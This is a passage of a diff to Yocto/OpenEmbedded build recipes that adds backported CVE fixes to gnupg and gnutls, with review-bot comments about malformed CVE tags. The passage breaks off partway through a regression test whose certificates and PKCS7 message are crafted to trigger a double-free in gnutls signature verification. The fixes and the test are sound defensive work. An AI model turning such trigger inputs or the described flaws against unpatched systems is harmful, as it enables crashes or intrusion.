diff --git a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
index 3e798efd06..a13b4d5fb5 100644
--- a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
+++ b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
@@ -1,7 +1,7 @@
-From 9c3858ffda6246bf9e1e6aeeb920532a56b19408 Mon Sep 17 00:00:00 2001
+From 6c75656b68cb6e38b039ae532bd39437cd6daec5 Mon Sep 17 00:00:00 2001
From: Saul Wold <sgw@linux.intel.com>
Date: Wed, 16 Aug 2017 11:18:01 +0800
-Subject: [PATCH 3/4] dirmngr uses libgpg error
+Subject: [PATCH] dirmngr uses libgpg error
Upstream-Status: Pending
Signed-off-by: Saul Wold <sgw@linux.intel.com>
@@ -9,24 +9,20 @@ Signed-off-by: Saul Wold <sgw@linux.intel.com>
Rebase to 2.1.23
Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+
---
- dirmngr/Makefile.am | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
+ dirmngr/Makefile.am | 1 +
+ 1 file changed, 1 insertion(+)
diff --git a/dirmngr/Makefile.am b/dirmngr/Makefile.am
-index b404165..d3f916e 100644
+index 00d3c42..450d873 100644
--- a/dirmngr/Makefile.am
+++ b/dirmngr/Makefile.am
-@@ -82,7 +82,8 @@ endif
- dirmngr_LDADD = $(libcommonpth) \
+@@ -101,6 +101,7 @@ dirmngr_LDADD = $(libcommonpth) \
$(DNSLIBS) $(LIBASSUAN_LIBS) \
$(LIBGCRYPT_LIBS) $(KSBA_LIBS) $(NPTH_LIBS) \
-- $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV)
-+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) \
-+ $(GPG_ERROR_LIBS)
+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) $(NETLIBS) \
++ $(GPG_ERROR_LIBS) \
+ $(dirmngr_robj)
if USE_LDAP
dirmngr_LDADD += $(ldaplibs)
- endif
---
-1.8.3.1
-
diff --git a/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
new file mode 100644
index 0000000000..5992949d35
--- /dev/null
+++ b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
@@ -0,0 +1,44 @@
+From 2f05fc96b1332caf97176841b1152da3f0aa16a8 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 22 Jul 2022 17:52:36 +0530
+Subject: [PATCH] CVE-2022-34903
+
+Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=gnupg.git;a=commit;h=34c649b3601383cd11dbc76221747ec16fd68e1b]
+CVE: CVE-2022-34903
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ g10/cpr.c | 13 ++++---------
+ 1 file changed, 4 insertions(+), 9 deletions(-)
+
+diff --git a/g10/cpr.c b/g10/cpr.c
+index d502e8b..bc4b715 100644
+--- a/g10/cpr.c
++++ b/g10/cpr.c
+@@ -328,20 +328,15 @@ write_status_text_and_buffer (int no, const char *string,
+ }
+ first = 0;
+ }
+- for (esc=0, s=buffer, n=len; n && !esc; s++, n--)
++ for (esc=0, s=buffer, n=len; n; s++, n--)
+ {
+ if (*s == '%' || *(const byte*)s <= lower_limit
+ || *(const byte*)s == 127 )
+ esc = 1;
+ if (wrap && ++count > wrap)
+- {
+- dowrap=1;
+- break;
+- }
+- }
+- if (esc)
+- {
+- s--; n++;
++ dowrap=1;
++ if (esc || dowrap)
++ break;
+ }
+ if (s != buffer)
+ es_fwrite (buffer, s-buffer, 1, statusfp);
+--
+2.25.1
+
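Review bot: The patch header records the backporter in `From:` and only `CVE-2022-34903` as the subject, so the upstream author and the commit message explaining the change are lost. The `Upstream-Status` URL does identify the commit, but an auditor has to fetch it to learn why the `!esc` loop condition and the `s--; n++` rewind were removed. Keeping the upstream `From:`/`Subject:` lines and message body, with the backporter only in `Signed-off-by:`, would match the other backports in this commit. write_status_text_and_buffer continues outside the inner hunk.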
diff --git a/meta/recipes-support/gnupg/gnupg/relocate.patch b/meta/recipes-support/gnupg/gnupg/relocate.patch
index e5a82aa76d..7f7812cd46 100644
--- a/meta/recipes-support/gnupg/gnupg/relocate.patch
+++ b/meta/recipes-support/gnupg/gnupg/relocate.patch
@@ -1,4 +1,4 @@
-From 59c077f32e81190955910cae02599c7a3edfa7fb Mon Sep 17 00:00:00 2001
+From bd66af2ac7bb6d9294ac8055a55462ba7c4f9c9b Mon Sep 17 00:00:00 2001
From: Ross Burton <ross.burton@intel.com>
Date: Wed, 19 Sep 2018 14:44:40 +0100
Subject: [PATCH] Allow the environment to override where gnupg looks for its
@@ -12,10 +12,10 @@ Signed-off-by: Ross Burton <ross.burton@intel.com>
1 file changed, 8 insertions(+), 8 deletions(-)
diff --git a/common/homedir.c b/common/homedir.c
-index e9e75d0..19140aa 100644
+index 4b6e46e..58989b4 100644
--- a/common/homedir.c
+++ b/common/homedir.c
-@@ -760,7 +760,7 @@ gnupg_socketdir (void)
+@@ -763,7 +763,7 @@ gnupg_socketdir (void)
if (!name)
{
unsigned int dummy;
@@ -24,7 +24,7 @@ index e9e75d0..19140aa 100644
}
return name;
-@@ -786,7 +786,7 @@ gnupg_sysconfdir (void)
+@@ -789,7 +789,7 @@ gnupg_sysconfdir (void)
}
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -33,7 +33,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -815,7 +815,7 @@ gnupg_bindir (void)
+@@ -818,7 +818,7 @@ gnupg_bindir (void)
else
return rdir;
#else /*!HAVE_W32_SYSTEM*/
@@ -42,7 +42,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -828,7 +828,7 @@ gnupg_libexecdir (void)
+@@ -831,7 +831,7 @@ gnupg_libexecdir (void)
#ifdef HAVE_W32_SYSTEM
return gnupg_bindir ();
#else /*!HAVE_W32_SYSTEM*/
@@ -51,7 +51,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -842,7 +842,7 @@ gnupg_libdir (void)
+@@ -845,7 +845,7 @@ gnupg_libdir (void)
name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL);
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -60,7 +60,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -856,7 +856,7 @@ gnupg_datadir (void)
+@@ -859,7 +859,7 @@ gnupg_datadir (void)
name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL);
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -69,7 +69,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -872,7 +872,7 @@ gnupg_localedir (void)
+@@ -875,7 +875,7 @@ gnupg_localedir (void)
NULL);
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -78,7 +78,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -940,7 +940,7 @@ gnupg_cachedir (void)
+@@ -943,7 +943,7 @@ gnupg_cachedir (void)
}
return dir;
#else /*!HAVE_W32_SYSTEM*/
diff --git a/meta/recipes-support/gnupg/gnupg_2.2.20.bb b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
index f754573c88..bd09b02017 100644
--- a/meta/recipes-support/gnupg/gnupg_2.2.20.bb
+++ b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
@@ -1,4 +1,9 @@
SUMMARY = "GNU Privacy Guard - encryption and signing tools (2.x)"
+DESCRIPTION = "A complete and free implementation of the OpenPGP standard \
+as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt \
+and sign your data and communications; it features a versatile key \
+management system, along with access modules for all kinds of public \
+key directories."
HOMEPAGE = "http://www.gnupg.org/"
LICENSE = "GPLv3 & LGPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=189af8afca6d6075ba6c9e0aa8077626 \
@@ -15,19 +20,20 @@ SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
file://0003-dirmngr-uses-libgpg-error.patch \
file://0004-autogen.sh-fix-find-version-for-beta-checking.patch \
file://0001-Woverride-init-is-not-needed-with-gcc-9.patch \
+ file://CVE-2022-34903.patch \
"
SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for-the-location-of-.patch \
file://relocate.patch"
SRC_URI_append_class-nativesdk = " file://relocate.patch"
-SRC_URI[md5sum] = "4ff88920cf52b35db0dedaee87bdbbb1"
-SRC_URI[sha256sum] = "04a7c9d48b74c399168ee8270e548588ddbe52218c337703d7f06373d326ca30"
+SRC_URI[sha256sum] = "34e60009014ea16402069136e0a5f63d9b65f90096244975db5cea74b3d02399"
EXTRA_OECONF = "--disable-ldap \
--disable-ccid-driver \
--with-zlib=${STAGING_LIBDIR}/.. \
--with-bzip2=${STAGING_LIBDIR}/.. \
--with-readline=${STAGING_LIBDIR}/.. \
+ --with-mailprog=${sbindir}/sendmail \
--enable-gpg-is-gpg2 \
"
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
new file mode 100644
index 0000000000..6fe7a21e33
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
@@ -0,0 +1,67 @@
+From 15beb4b193b2714d88107e7dffca781798684e7e Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Fri, 29 Jan 2021 14:06:32 +0100
+Subject: [PATCH] key_share: avoid use-after-free around realloc
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/15beb4b193b2714d88107e7dffca781798684e7e
+Upstream-Status: Backport
+CVE: CVE-2021-CVE-2021-20231
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ext/key_share.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/lib/ext/key_share.c b/lib/ext/key_share.c
+index ab8abf8fe6..a8c4bb5cff 100644
+--- a/lib/ext/key_share.c
++++ b/lib/ext/key_share.c
+@@ -664,14 +664,14 @@ key_share_send_params(gnutls_session_t session,
+ {
+ unsigned i;
+ int ret;
+- unsigned char *lengthp;
+- unsigned int cur_length;
+ unsigned int generated = 0;
+ const gnutls_group_entry_st *group;
+ const version_entry_st *ver;
+
+ /* this extension is only being sent on client side */
+ if (session->security_parameters.entity == GNUTLS_CLIENT) {
++ unsigned int length_pos;
++
+ ver = _gnutls_version_max(session);
+ if (unlikely(ver == NULL || ver->key_shares == 0))
+ return 0;
+@@ -679,16 +679,13 @@ key_share_send_params(gnutls_session_t session,
+ if (!have_creds_for_tls13(session))
+ return 0;
+
+- /* write the total length later */
+- lengthp = &extdata->data[extdata->length];
++ length_pos = extdata->length;
+
+ ret =
+ _gnutls_buffer_append_prefix(extdata, 16, 0);
+ if (ret < 0)
+ return gnutls_assert_val(ret);
+
+- cur_length = extdata->length;
+-
+ if (session->internals.hsk_flags & HSK_HRR_RECEIVED) { /* we know the group */
+ group = get_group(session);
+ if (unlikely(group == NULL))
+@@ -736,7 +733,8 @@ key_share_send_params(gnutls_session_t session,
+ }
+
+ /* copy actual length */
+- _gnutls_write_uint16(extdata->length - cur_length, lengthp);
++ _gnutls_write_uint16(extdata->length - length_pos - 2,
++ &extdata->data[length_pos]);
+
+ } else { /* server */
+ ver = get_version(session);
+--
+GitLab
+
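Review bot: The tag line `CVE: CVE-2021-CVE-2021-20231` in the patch header is malformed; it should read `CVE: CVE-2021-20231`. Tooling that reads the `CVE:` tag to mark an issue as patched may not recognise the doubled prefix, leaving the result to depend on the file name alone. The header of CVE-2021-20232.patch, which follows, has the same doubled prefix (`CVE: CVE-2021-CVE-2021-20232`).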
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
new file mode 100644
index 0000000000..e13917cddb
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
@@ -0,0 +1,65 @@
+From 75a937d97f4fefc6f9b08e3791f151445f551cb3 Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Fri, 29 Jan 2021 14:06:50 +0100
+Subject: [PATCH] pre_shared_key: avoid use-after-free around realloc
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/75a937d97f4fefc6f9b08e3791f151445f551cb3
+Upstream-Status: Backport
+CVE: CVE-2021-CVE-2021-20232
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ext/pre_shared_key.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/lib/ext/pre_shared_key.c b/lib/ext/pre_shared_key.c
+index a042c6488e..380bf39ed5 100644
+--- a/lib/ext/pre_shared_key.c
++++ b/lib/ext/pre_shared_key.c
+@@ -267,7 +267,7 @@ client_send_params(gnutls_session_t session,
+ size_t spos;
+ gnutls_datum_t username = {NULL, 0};
+ gnutls_datum_t user_key = {NULL, 0}, rkey = {NULL, 0};
+- gnutls_datum_t client_hello;
++ unsigned client_hello_len;
+ unsigned next_idx;
+ const mac_entry_st *prf_res = NULL;
+ const mac_entry_st *prf_psk = NULL;
+@@ -428,8 +428,7 @@ client_send_params(gnutls_session_t session,
+ assert(extdata->length >= sizeof(mbuffer_st));
+ assert(ext_offset >= (ssize_t)sizeof(mbuffer_st));
+ ext_offset -= sizeof(mbuffer_st);
+- client_hello.data = extdata->data+sizeof(mbuffer_st);
+- client_hello.size = extdata->length-sizeof(mbuffer_st);
++ client_hello_len = extdata->length-sizeof(mbuffer_st);
+
+ next_idx = 0;
+
+@@ -440,6 +439,11 @@ client_send_params(gnutls_session_t session,
+ }
+
+ if (prf_res && rkey.size > 0) {
++ gnutls_datum_t client_hello;
++
++ client_hello.data = extdata->data+sizeof(mbuffer_st);
++ client_hello.size = client_hello_len;
++
+ ret = compute_psk_binder(session, prf_res,
+ binders_len, binders_pos,
+ ext_offset, &rkey, &client_hello, 1,
+@@ -474,6 +478,11 @@ client_send_params(gnutls_session_t session,
+ }
+
+ if (prf_psk && user_key.size > 0 && info) {
++ gnutls_datum_t client_hello;
++
++ client_hello.data = extdata->data+sizeof(mbuffer_st);
++ client_hello.size = client_hello_len;
++
+ ret = compute_psk_binder(session, prf_psk,
+ binders_len, binders_pos,
+ ext_offset, &user_key, &client_hello, 0,
+--
+GitLab
+
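Review bot: The tag line `CVE: CVE-2021-CVE-2021-20232` in this patch header is malformed and should read `CVE: CVE-2021-20232`; the header of CVE-2021-20231.patch just above has the same mistake (`CVE: CVE-2021-CVE-2021-20231`). Tooling that reads the `CVE:` tag from patch headers to mark an issue as patched may not recognise this form, in which case the fix would be tracked only through the file name, if at all. The C change itself re-derives `client_hello.data` from `extdata->data` immediately before each `compute_psk_binder` call instead of holding a pointer across code that can reallocate the buffer. The body of `client_send_params` continues outside the quoted hunks.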
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
new file mode 100644
index 0000000000..0bcb55e573
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
@@ -0,0 +1,37 @@
+From 3db352734472d851318944db13be73da61300568 Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Wed, 22 Dec 2021 09:12:25 +0100
+Subject: [PATCH] wrap_nettle_hash_fast: avoid calling _update with zero-length
+ input
+
+As Nettle's hash update functions internally call memcpy, providing
+zero-length input may cause undefined behavior.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568
+Upstream-Status: Backport
+CVE: CVE-2021-4209
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/nettle/mac.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/lib/nettle/mac.c b/lib/nettle/mac.c
+index f9d4d7a8df..35e070fab0 100644
+--- a/lib/nettle/mac.c
++++ b/lib/nettle/mac.c
+@@ -788,7 +788,9 @@ static int wrap_nettle_hash_fast(gnutls_digest_algorithm_t algo,
+ if (ret < 0)
+ return gnutls_assert_val(ret);
+
+- ctx.update(&ctx, text_size, text);
++ if (text_size > 0) {
++ ctx.update(&ctx, text_size, text);
++ }
+ ctx.digest(&ctx, ctx.length, digest);
+
+ return 0;
+--
+GitLab
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
new file mode 100644
index 0000000000..f8954945d0
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
@@ -0,0 +1,282 @@
+From 9835638d4e1f37781a47e777c76d5bb14218929b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 16 Aug 2022 12:23:14 +0530
+Subject: [PATCH] CVE-2022-2509
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/ce37f9eb265dbe9b6d597f5767449e8ee95848e2]
+CVE: CVE-2022-2509
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ NEWS | 4 +
+ lib/x509/pkcs7.c | 3 +-
+ tests/Makefile.am | 2 +-
+ tests/pkcs7-verify-double-free.c | 215 +++++++++++++++++++++++++++++++
+ 4 files changed, 222 insertions(+), 2 deletions(-)
+ create mode 100644 tests/pkcs7-verify-double-free.c
+
+diff --git a/NEWS b/NEWS
+index 755a67c..ba70bb3 100644
+--- a/NEWS
++++ b/NEWS
+@@ -7,6 +7,10 @@ See the end for copying conditions.
+
+ * Version 3.6.14 (released 2020-06-03)
+
++** libgnutls: Fixed double free during verification of pkcs7 signatures.
++ Reported by Jaak Ristioja (#1383). [GNUTLS-SA-2022-07-07, CVSS: medium]
++ [CVE-2022-2509]
++
+ ** libgnutls: Fixed insecure session ticket key construction, since 3.6.4.
+ The TLS server would not bind the session ticket encryption key with a
+ value supplied by the application until the initial key rotation, allowing
+diff --git a/lib/x509/pkcs7.c b/lib/x509/pkcs7.c
+index 98669e8..ccbc69d 100644
+--- a/lib/x509/pkcs7.c
++++ b/lib/x509/pkcs7.c
+@@ -1318,7 +1318,8 @@ gnutls_x509_crt_t find_signer(gnutls_pkcs7_t pkcs7, gnutls_x509_trust_list_t tl,
+ issuer = find_verified_issuer_of(pkcs7, issuer, purpose, vflags);
+
+ if (issuer != NULL && gnutls_x509_crt_check_issuer(issuer, issuer)) {
+- if (prev) gnutls_x509_crt_deinit(prev);
++ if (prev && prev != signer)
++ gnutls_x509_crt_deinit(prev);
+ prev = issuer;
+ break;
+ }
+diff --git a/tests/Makefile.am b/tests/Makefile.am
+index 11a083c..cd43a0f 100644
+--- a/tests/Makefile.am
++++ b/tests/Makefile.am
+@@ -219,7 +219,7 @@ ctests += mini-record-2 simple gnutls_hmac_fast set_pkcs12_cred cert certuniquei
+ tls-record-size-limit-asym dh-compute ecdh-compute sign-verify-data-newapi \
+ sign-verify-newapi sign-verify-deterministic iov aead-cipher-vec \
+ tls13-without-timeout-func buffer status-request-revoked \
+- set_x509_ocsp_multi_cli kdf-api keylog-func \
++ set_x509_ocsp_multi_cli kdf-api keylog-func pkcs7-verify-double-free \
+ dtls_hello_random_value tls_hello_random_value x509cert-dntypes
+
+ if HAVE_SECCOMP_TESTS
+diff --git a/tests/pkcs7-verify-double-free.c b/tests/pkcs7-verify-double-free.c
+new file mode 100644
+index 0000000..fadf307
+--- /dev/null
++++ b/tests/pkcs7-verify-double-free.c
+@@ -0,0 +1,215 @@
++/*
++ * Copyright (C) 2022 Red Hat, Inc.
++ *
++ * Author: Zoltan Fridrich
++ *
++ * This file is part of GnuTLS.
++ *
++ * GnuTLS is free software: you can redistribute it and/or modify it
++ * under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GnuTLS is distributed in the hope that it will be useful, but
++ * WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ * General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GnuTLS. If not, see <https://www.gnu.org/licenses/>.
++ */
++
++#ifdef HAVE_CONFIG_H
++#include <config.h>
++#endif
++
++#include <stdio.h>
++#include <gnutls/pkcs7.h>
++#include <gnutls/x509.h>
++
++#include "utils.h"
++
++static char rca_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDCjCCAfKgAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
++ "cGxlIENBMCAXDTE3MDcyMTE0NDMzNloYDzIyMjIwNzIxMTQ0MzM2WjAVMRMwEQYD\n"
++ "VQQKDApFeGFtcGxlIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA\n"
++ "v8hnKPJ/IA0SQB/A/a0Uh+npZ67vsgIMrtTQo0r0kJkmkBz5323xO3DVuJfB3QmX\n"
++ "v9zvoeCQLuDvWar5Aixfxgm6s5Q+yPvJj9t3NebDrU+Y4+qyewBIJUF8EF/5iBPC\n"
++ "ZHONmzbfIRWvQWGGgb2CRcOHp2J7AY/QLB6LsWPaLjs/DHva28Q13JaTTHIpdu8v\n"
++ "t6vHr0nXf66DN4MvtoF3N+o+v3snJCMsfXOqASi4tbWR7gtOfCfiz9uBjh0W2Dut\n"
++ "/jclBQkJkLe6esNSM+f4YiOpctVDjmfj8yoHCp394vt0wFqhG38wsTFAyVP6qIcf\n"
++ "5zoSu9ovEt2cTkhnZHjiiwIDAQABo2MwYTAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud\n"
++ "DwEB/wQEAwIBBjAdBgNVHQ4EFgQUhjeO6Uc5imbjOl2I2ltVA27Hu9YwHwYDVR0j\n"
++ "BBgwFoAUhjeO6Uc5imbjOl2I2ltVA27Hu9YwDQYJKoZIhvcNAQELBQADggEBAD+r\n"
++ "i/7FsbG0OFKGF2+JOnth6NjJQcMfM8LiglqAuBUijrv7vltoZ0Z3FJH1Vi4OeMXn\n"
++ "l7X/9tWUve0uFl75MfjDrf0+lCEdYRY1LCba2BrUgpbbkLywVUdnbsvndehegCgS\n"
++ "jss2/zys3Hlo3ZaHlTMQ/NQ4nrxcxkjOvkZSEOqgxJTLpzm6pr7YUts4k6c6lNiB\n"
++ "FSiJiDzsJCmWR9C3fBbUlfDfTJYGN3JwqX270KchXDElo8gNoDnF7jBMpLFFSEKm\n"
++ "MyfbNLX/srh+CEfZaN/OZV4A3MQ0L8vQEp6M4CJhvRLIuMVabZ2coJ0AzystrOMU\n"
++ "LirBWjg89RoAjFQ7bTE=\n"
++ "-----END CERTIFICATE-----\n";
++
++static char ca_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDFzCCAf+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
++ "cGxlIENBMCAXDTE3MDcyMTE0NDQzNFoYDzIyMjIwNzIxMTQ0NDM0WjAiMSAwHgYD\n"
++ "VQQKDBdFeGFtcGxlIGludGVybWVkaWF0ZSBDQTCCASIwDQYJKoZIhvcNAQEBBQAD\n"
++ "ggEPADCCAQoCggEBAKb9ACB8u//sP6MfNU1OsVw68xz3eTPLgKxS0vpqexm6iGVg\n"
++ "ug/o9uYRLzqiEukv/eyz9WzHmY7sqlOJjOFdv92+SaNg79Jc51WHPFXgea4/qyfr\n"
++ "4y14PGs0SNxm6T44sXurUs7cXydQVUgnq2VCaWFOTUdxXoAWkV8r8GaUoPD/klVz\n"
++ "RqxSZVETmX1XBKhsMnnov41kRwVph2C+VfUspsbaUZaz/o/S1/nokhXRACzKsMBr\n"
++ "obqiGxbY35uVzsmbAW5ErhQz98AWJL3Bub1fsEMXg6OEMmPH4AtX888dTIYZNw0E\n"
++ "bUIESspz1kjJQTtVQDHTprhwz16YiSVeUonlLgMCAwEAAaNjMGEwDwYDVR0TAQH/\n"
++ "BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFPBjxDWjMhjXERirKF9O\n"
++ "o/5Cllc5MB8GA1UdIwQYMBaAFIY3julHOYpm4zpdiNpbVQNux7vWMA0GCSqGSIb3\n"
++ "DQEBCwUAA4IBAQCTm+vv3hBa6lL5IT+Fw8aTxQ2Ne7mZ5oyazhvXYwwfKNMX3SML\n"
++ "W2JdPaL64ZwbxxxYvW401o5Z0CEgru3YFrsqB/hEdl0Uf8UWWJmE1rRa+miTmbjt\n"
++ "lrLNCWdrs6CiwvsPITTHg7jevB4KyZYsTSxQFcyr3N3xF+6EmOTC4IkhPPnXYXcp\n"
++ "248ih+WOavSYoRvzgB/Dip1WnPYU2mfIV3O8JReRryngA0TzWCLPLUoWR3R4jwtC\n"
++ "+1uSLoqaenz3qv3F1WEbke37az9YJuXx/5D8CqFQiZ62TUUtI6fYd8mkMBM4Qfh6\n"
++ "NW9XrCkI9wlpL5K9HllhuW0BhKeJkuPpyQ2p\n"
++ "-----END CERTIFICATE-----\n";
++
++static char ee_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDIjCCAgqgAwIBAgIBATANBgkqhkiG9w0BAQsFADAiMSAwHgYDVQQKDBdFeGFt\n"
++ "cGxlIGludGVybWVkaWF0ZSBDQTAgFw0yMjA3MjExNDQ1MzdaGA8yMjIyMDcyMTE0\n"
++ "NDUzN1owFTETMBEGA1UEAwwKSm9obiBTbWl0aDCCASIwDQYJKoZIhvcNAQEBBQAD\n"
++ "ggEPADCCAQoCggEBAMb1uuxppBFY+WVD45iyHUq7DkIJNNOI/JRaybVJfPktWq2E\n"
++ "eNe7XhV05KKnqZTbDO2iYqNHqGhZ8pz/IstDRTZP3z/q1vXTG0P9Gx28rEy5TaUY\n"
++ "QjtD+ZoFUQm0ORMDBjd8jikqtJ87hKeuOPMH4rzdydotMaPQSm7KLzHBGBr6gg7z\n"
++ "g1IxPWkhMyHapoMqqrhjwjzoTY97UIXpZTEoIA+KpEC8f9CciBtL0i1MPBjWozB6\n"
++ "Jma9q5iEwZXuRr3cnPYeIPlK2drgDZCMuSFcYiT8ApLw5OhKqY1m2EvfZ2ox2s9R\n"
++ "68/HzYdPi3kZwiNEtlBvMlpt5yKBJAflp76d7DkCAwEAAaNuMGwwCwYDVR0PBAQD\n"
++ "AgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDBDAdBgNVHQ4EFgQUc+Mi\n"
++ "kr8WMCk00SQo+P2iggp/oQkwHwYDVR0jBBgwFoAU8GPENaMyGNcRGKsoX06j/kKW\n"
++ "VzkwDQYJKoZIhvcNAQELBQADggEBAKU9+CUR0Jcfybd1+8Aqgh1RH96yQygnVuyt\n"
++ "Na9rFz4fM3ij9tGXDHXrkZw8bW1dWLU9quu8zeTxKxc3aiDIw739Alz0tukttDo7\n"
++ "dW7YqIb77zsIsWB9p7G9dlxT6ieUy+5IKk69BbeK8KR0vAciAG4KVQxPhuPy/LGX\n"
++ "PzqlJIJ4h61s3UOroReHPB1keLZgpORqrvtpClOmABH9TLFRJA/WFg8Q2XYB/p0x\n"
++ "l/pWiaoBC+8wK9cDoMUK5yOwXeuCLffCb+UlAD0+z/qxJ2pisE8E9X8rRKRrWI+i\n"
++ "G7LtJCEn86EQK8KuRlJxKgj8lClZhoULB0oL4jbblBuNow9WRmM=\n"
++ "-----END CERTIFICATE-----\n";
++
++static char msg_pem[] =
++ "-----BEGIN PKCS7-----\n"
++ "MIIK2QYJKoZIhvcNAQcCoIIKyjCCCsYCAQExDTALBglghkgBZQMEAgEwCwYJKoZI\n"
++ "hvcNAQcBoIIJTzCCAwowggHyoAMCAQICAQEwDQYJKoZIhvcNAQELBQAwFTETMBEG\n"
++ "A1UECgwKRXhhbXBsZSBDQTAgFw0xNzA3MjExNDQzMjFaGA8yMjIyMDcyMTE0NDMy\n"
++ "MVowFTETMBEGA1UECgwKRXhhbXBsZSBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEP\n"
++ "ADCCAQoCggEBAL51eyE4j8wAKQKMGlO9HEY2iaGvsdPSJmidSdmCi1jnNK39Lx4Y\n"
++ "31h279hSHF5wtI6VM91HHfeLf1mjEZHlKrXXJQzBPLpbHWapD778drHBitOP8e56\n"
++ "fDMIfofLV4tkMk8690vPe4cJH1UHGspMyz6EQF9kPRaW80XtMV/6dalgL/9Esmaw\n"
++ "XBNPJAS1VutDuXQkJ/3/rWFLmkpYHHtGPjX782YRmT1s+VOVTsLqmKx0TEL8A381\n"
++ "bbElHPUAMjPcyWR5qqA8KWnS5Dwqk3LwI0AvuhQytCq0S7Xl4DXauvxwTRXv0UU7\n"
